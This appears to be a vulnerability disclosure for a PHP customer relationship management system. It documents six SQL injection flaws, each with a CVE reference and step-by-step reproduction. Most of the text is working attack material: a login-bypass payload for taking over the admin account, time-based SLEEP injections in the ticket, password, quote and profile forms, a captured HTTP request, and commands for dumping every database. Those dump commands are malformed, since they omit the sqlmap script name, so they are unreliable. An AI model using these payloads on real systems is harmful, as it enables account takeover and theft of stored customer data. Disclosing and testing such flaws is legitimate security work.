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# Simple Customer Relationship Management System v1.0 - SQL Injection Vulnerability
## Multiple SQL Injection Vulnerability found in Simple Customer Relationship Management System 1.0 version.
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the username parameter under the Admin Panel.
**Step to Reproduce :-**
> 1. Navigate to the Admin Panel By following the URL: http://localhost/php-scrm/admin/
> 2. Now insert the below-given payload in the username field and any random digits/string like "test" in the password field then click on the "Login" button to takeover the admin account.
> Payload: ' or 1 = 1 -- -
**Reference: CVE-2023-24364**
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the Description parameter under the Create ticket function.
**Step to Reproduce :-**
> 1. Now register a user by navigating the URL: http://localhost/php-scrm/registration.php
> 2. Now login registered user with the valid credential by following the URL: http://localhost/php-scrm/login.php
> 3. Now Navigate to the Create ticket page By following the URL: http://localhost/php-scrm/create-ticket.php
> 4. Now fill out the Create ticket form then intercept the request in the burp suite.
> 5. Now send the burp suite intercepted request into the burp repeater.
> Payload: ' AND (SELECT 123456 FROM (SELECT(SLEEP(10)))xyz) AND 'abc'='abc
> 6. Now insert the URL-encoded payload in the description parameter.
> subject=newticket&tasktype=Option+1&priority=important&description=newdescriptiontest'+AND+(SELECT+123456+FROM+(SELECT(SLEEP(10)))xyz)+AND+'abc'%3d'abc&send=Send
> 7. Now click on the "send" button to send the request.
> 8. Now you will see the response is delayed by 10 seconds and is vulnerable to SQL injection.
> 9. Now dump data by using sqlmap.
> 10. Now copy the burp intercepted request and create a file crm-create-ticket-request.txt
> 11. Now dump databases by sqlmap.
> # python -r crm-create-ticket-request.txt -p description -dbs --batch
> 12. Now dump all data by sqlmap.
> # python -r crm-create-ticket-request.txt -p description --dump-all --batch
**Reference: CVE-2023-24652**
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the oldpass parameter under the Change Password function.
**Step to Reproduce :-**
> 1. Now register a user by navigating the URL: http://localhost/php-scrm/registration.php
> 2. Now login registered user with the valid credential by following the URL: http://localhost/php-scrm/login.php
> 3. Now Navigate to the change password page By following the URL: http://localhost/php-scrm/change-password.php
> 4. Now fill out the Change Password form put random digits/string like "test123" in the "Current Password" field and put random content like "123456" in "New Password" and "Confirm Password" fields then intercept the request in burp suite.
> 5. Now send the burp suite intercepted request into burp repeater.
> 6. Now insert the below-given payload in the oldpass parameter then click on the "send" button to send request.
> Payload: oldpass=test123'+AND+(SELECT+123+FROM+(SELECT(SLEEP(10)))abc)+AND'&newpass=123456&confirmpassword=123456&change=change
> 7. Now you will see the response is delayed by 10 seconds and is vulnerable to SQL injection.
> 8. Now dump data by using sqlmap.
> 9. Now copy the burp intercepted request and create a file crm-request.txt
> POST /php-scrm/change-password.php HTTP/1.1
> Host: localhost
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 65
> Origin: http://localhost
> Connection: close
> Referer: http://localhost/php-scrm/change-password.php
> Cookie: PHPSESSID=65c7e25jf215pltjkg8gr5kli9
> Upgrade-Insecure-Requests: 1
> Sec-Fetch-Dest: document
> Sec-Fetch-Mode: navigate
> Sec-Fetch-Site: same-origin
> Sec-Fetch-User: ?1
> oldpass=test123&newpass=123456&confirmpassword=123456&change=Change
> 10. Now dump databases by sqlmap.
> # python -r crm-request.txt -p oldpass -dbs --batch
> 11. Now dump all data by sqlmap.
> # python -r crm-request.txt -p oldpass --dump-all --batch
**Reference: CVE-2023-24653**
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the name parameter under the Request a Quote function.
**Step to Reproduce :-**
> 1. Now register a user by navigating the URL: http://localhost/php-scrm/registration.php
> 2. Now login registered user with the valid credential by following the URL: http://localhost/php-scrm/login.php
> 3. Now Navigate to the Request a Quote page By following the URL: http://localhost/php-scrm/get-quote.php
> 4. Now fill out the Quote Request Form then intercept the request in the burp suite.
> 5. Now send the burp suite intercepted request into the burp repeater.
> Payload: ' AND (SELECT 123456 FROM (SELECT(SLEEP(5)))xyz) AND 'abc'='abc
> 6. Now insert the payload in the name parameter.
> Content-Disposition: form-data; name="name"
> test1' AND (SELECT 123456 FROM (SELECT(SLEEP(10)))xyz) AND 'abc'='abc
> 7. Now click on the "send" button to send the request.
> 8. Now you will see the response is delayed by 10 seconds and is vulnerable to SQL injection.
> 9. Now dump data by using sqlmap.
> 10. Now copy the burp intercepted request and create a file crm-quote-request.txt
> 11. Now dump databases by sqlmap.
> # python -r crm-quote-request.txt -p name -dbs --batch
> 12. Now dump all data by sqlmap.
> # python -r crm-quote-request.txt -p name --dump-all --batch
**Reference: CVE-2023-24654**
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the name parameter under the Profile Update function.
**Step to Reproduce :-**
> 1. Now register a user by navigating the URL: http://localhost/php-scrm/registration.php
> 2. Now login registered user with the valid credential by following the URL: http://localhost/php-scrm/login.php
> 3. Now Navigate to the profile update page By following the URL: http://localhost/php-scrm/profile.php
> 4. Now fill out your profile form then intercept the request in the burp suite.
> 5. Now send the burp suite intercepted request into the burp repeater.
> Payload: ' AND (SELECT 123 FROM (SELECT(SLEEP(10)))abc)-- abc
> 6. Now insert the payload in the name parameter.
> Content-Disposition: form-data; name="name"
> user1' AND (SELECT 123 FROM (SELECT(SLEEP(10)))abc)-- abc
> 7. Now click on the "send" button to send the request.
> 8. Now you will see the response is delayed by 10 seconds and is vulnerable to SQL injection.
> 9. Now dump data by using sqlmap.
> 10. Now copy the burp intercepted request and create a file crm-profile-request.txt
> 11. Now dump databases by sqlmap.
> # python -r crm-profile-request.txt -p name -dbs --batch
> 12. Now dump all data by sqlmap.
> # python -r crm-profile-request.txt -p name --dump-all --batch
**Reference: CVE-2023-24655**
> Simple Customer Relationship Management System v1.0 was discovered to contain a SQL injection vulnerability via the subject parameter under the Create Ticket function.
**Step to Reproduce :-**
> 1. Now register a user by navigating the URL: http://localhost/php-scrm/registration.php
> 2. Now login registered user with the valid credential by following the URL: http://localhost/php-scrm/login.php
> 3. Now Navigate to the Create ticket page By following the URL: http://localhost/php-scrm/create-ticket.php
> 4. Now fill out the Create ticket form then intercept the request in the burp suite.
> 5. Now send the burp suite intercepted request into the burp repeater.
> Payload: ' AND (SELECT 123456 FROM (SELECT(SLEEP(10)))xyz) AND 'abc'='abc
> 6. Now insert the URL-encoded payload in the subject parameter.
> subject=newticket'+AND+(SELECT+123456+FROM+(SELECT(SLEEP(10)))xyz)+AND+'abc'%3d'abc&tasktype=Option+1&priority=important&description=newdescriptiontest&send=Send
> 7. Now click on the "send" button to send the request.
> 8. Now you will see the response is delayed by 10 seconds and is vulnerable to SQL injection.
> 9. Now dump data by using sqlmap.
> 10. Now copy the burp intercepted request and create a file crm-create-ticket-request.txt
> 11. Now dump databases by sqlmap.
> # python -r crm-create-ticket-request.txt -p subject -dbs --batch
> 12. Now dump all data by sqlmap.
> # python -r crm-create-ticket-request.txt -p subject --dump-all --batch
**Reference: CVE-2023-24656**
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